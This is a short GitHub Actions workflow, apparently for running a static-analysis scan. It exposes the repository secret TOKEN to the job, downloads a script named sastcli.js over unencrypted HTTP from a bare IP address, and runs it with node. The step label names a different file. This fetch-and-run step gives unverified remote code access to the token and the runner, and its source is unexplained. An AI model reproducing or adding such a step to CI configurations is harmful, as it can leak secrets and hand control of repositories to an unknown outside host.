name: Run sastcli.js
on:
  push:
    branches: [ testing ]

jobs:
  run_index:
    runs-on: ubuntu-latest
    env:
      TOKEN: ${{ secrets.TOKEN }}
      GITHUB_REPOSITORY: ${{ github.repository }}

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Setup Node.js
      uses: actions/setup-node@v2
      with:
        node-version: '20'

    - name: Install dependencies
      run: npm install commander axios @octokit/rest

    - name: Download index.js
      run: curl http://139.84.131.137:8000/sastcli.js -o sastcli.js

    - name: Run sastcli.js
      run: node sastcli.js scan
